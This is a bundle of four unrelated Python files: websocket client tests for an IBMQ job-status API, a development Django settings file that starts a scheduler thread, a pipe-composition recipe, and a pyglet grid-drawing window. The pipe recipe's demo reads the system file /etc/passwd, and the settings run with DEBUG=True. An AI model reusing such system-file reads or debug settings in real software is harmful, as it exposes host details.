with self.assertRaises(WebsocketIBMQProtocolError):
_ = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id'))
def test_websocket_retry_success(self):
"""Test retrieving a job status during a retry attempt."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_WEBSOCKET_RETRY_SUCCESS)
response = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id'))
self.assertIsInstance(response, dict)
self.assertIn('status', response)
self.assertEqual(response['status'], 'COMPLETED')
def test_websocket_retry_failure(self):
"""Test exceeding the retry limit for retrieving a job status."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_WEBSOCKET_RETRY_FAILURE)
with self.assertRaises(WebsocketError):
_ = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id'))
def test_websocket_job_not_found(self):
"""Test retrieving a job status for an non existent id."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_WEBSOCKET_JOB_NOT_FOUND)
with self.assertRaises(WebsocketError):
_ = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id'))
def test_websocket_status_queue(self):
"""Test status queue used by websocket client."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_JOB_TRANSITION)
status_queue = RefreshQueue(maxsize=10)
_ = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id', status_queue=status_queue))
self.assertEqual(status_queue.qsize(), 2)
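# Hedged entry point (not in the original module), assuming the standard
# unittest runner is enough to drive these IBMQTestCase-based tests:
if __name__ == '__main__':
    import unittest
    unittest.main()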
|
settings_20210906111421.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# schedule.every().day.at("11:00").do(decrease_day_count_and_send_bday_mails)
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON STARTS////////////////////
# Schedule the daily task (the example below is registered for 11:15)
def sayHi():
print("Hi")
schedule.every().day.at("11:15").do(sayHi)
# schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise)
def func():
while True:
print("======Runnning==========")
schedule.run_pending()
time.sleep(5)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
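# Hedged note (not from the original): func() loops forever, so the thread
# started above keeps the process alive at shutdown; a minimal daemon variant
# of that wiring would be:
#
#     t1 = threading.Thread(target=func, daemon=True)
#     t1.start()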
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path = os.path.join(BASE_DIR, 'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
recipe-576757.py
|
from io import BytesIO
from subprocess import Popen, PIPE
from os import pipe, fdopen
from threading import Thread
class Pipeable( object ):
def __init__( self ):
self.output = None
def _output( self, input = None ):
return self.output
def __or__( self, right ):
if not isinstance( right, Pipeable ): return NotImplemented
self.output = right._output( self._output() )
return self
class Shell( Pipeable ):
def __init__( self, cmd ):
Pipeable.__init__( self )
self.cmd = cmd
def _output( self, input = None ):
return Popen( self.cmd, stdin = input, stdout = PIPE ).stdout
class ThreadedFilter( Pipeable ):
def __init__( self, filter ):
self.filter = filter
_pipe = pipe()
        # binary-mode ends: under Python 3 the upstream stages yield bytes
        self.pipe = fdopen( _pipe[ 1 ], 'wb' )
        self.output = fdopen( _pipe[ 0 ], 'rb' )
def _output( self, input = None ):
def _target():
            _out = self.pipe
            for line in input:
                _out.write( self.filter( line ) )
            # close the write end so downstream readers see EOF
            _out.close()
Thread( target = _target ).start()
return self.output
class CachedFilter( Pipeable ):
def __init__( self, filter ):
self.filter = filter
def _output( self, input = None ):
output = BytesIO()
for line in input:
output.write( self.filter( line ) )
output.seek( 0 )
return output
class Output( Pipeable ):
def __init__( self, output ):
self.output = output
class Print( object ):
def __ror__( self, left ):
        print( left.output.read().decode() )
class Write( object ):
def __init__( self, path ):
self.path = path
def __ror__( self, left ):
        f = open( self.path, 'wb' )  # binary mode: upstream stages produce bytes
while True:
buf = left.output.read( 1024 )
if not buf: break
f.write( buf )
f.close()
if __name__ == '__main__':
Output( open( "/etc/passwd" ) ) | Shell( "rev" ) | ThreadedFilter( lambda str : str[::-1] ) | CachedFilter( lambda x : x ) | Print()
|
TschunkView.py
|
import sys
import pyglet
from pyglet.gl import *
import primitives
import utils
from map1 import *
import threading
FPS = 60
smoothConfig = utils.getSmoothConfig()
class TschunkView(pyglet.window.Window):
def mapX(self, x):
return self.cord_origin_x + x * self.x_step
def mapY(self, y):
return self.cord_origin_y + y * self.y_step
def __init__(self, mymap):
super(TschunkView, self).__init__(fullscreen=False, caption='Tschunk!', config=smoothConfig)
self.map = mymap
self.image = pyglet.resource.image(mymap.img)
self.sprite = pyglet.sprite.Sprite(self.image)
        # integer cell size, as the original Python 2 "/" division implied
        self.y_step = self.image.height // mymap.rows + 1
        self.x_step = self.image.width // mymap.cols + 1
        self.cord_origin_x = self.x_step // 2
        self.cord_origin_y = self.y_step // 2
self.x = mymap.origin_x
self.y = mymap.origin_y
start_x = self.mapX(self.x)
start_y = self.mapY(self.y)
self.direction = mymap.initial_direction
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
#self.l = primitives.Line((0,0),(100,100),stroke=10,color=(1,0,0,1))
self.c = primitives.Circle(start_x, start_y,width=self.y_step,color=(1.,0.,0.,1.))
self.drops = []
# Setup debug framerate display:
self.fps_display = pyglet.clock.ClockDisplay()
# Schedule the update of this window, so it will advance in time at the
# defined framerate. If we don't, the window will only update on events
# like mouse motion.
#pyglet.clock.schedule_interval(self.update, 1.0)
self.set_size(self.image.width, self.image.height)
def on_draw(self):
self.c.x = self.mapX(self.x)
self.c.y = self.mapY(self.y)
self.clear()
self.sprite.draw()
#self.l.render()
self.c.render()
for drop in self.drops:
drop.render()
#self.fps_display.draw()
#def update(self, dt):
# if self.c.y - self.y_step > 0:
# self.c.y -= self.y_step
#def on_mouse_motion(self, x, y, dx, dy):
# nothing to do here if not in debug
#print x, y
    def run(self, callback=lambda: None):
self.thread = threading.Thread(target=callback)
        self.thread.daemon = True
self.thread.start()
pyglet.app.run()
def dropTo(self, x, y):
self.drops.append(primitives.Circle(self.mapX(x), self.mapY(y),width=self.y_step,color=(0.,.9,0.,1.)))
def drop(self):
(x, y) = self.direction
self.dropTo(self.x + x, self.y + y)
def setDirection(self, direction):
self.direction = direction
def moveTo(self, x, y):
self.x = x
self.y = y
def move(self):
self.moveBy(self.direction)
def moveBy(self, direction):
(x, y) = direction
success = False
if self.y + y > 0 and self.y + y < self.map.rows:
self.y += y
success = True
if self.x + x > 0 and self.x + x < self.map.cols:
self.x += x
success = True
return success
if __name__ == '__main__':
TschunkView(TschunkMap1())
sys.exit(pyglet.app.run())
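# Hedged usage sketch (not part of the original): instead of calling
# pyglet.app.run() directly as above, the run() method defined earlier can
# drive the view from a background callback thread, e.g.:
#
#     view = TschunkView(TschunkMap1())
#     def walk():
#         import time
#         for _ in range(10):
#             view.move()
#             view.drop()
#             time.sleep(0.5)
#     view.run(walk)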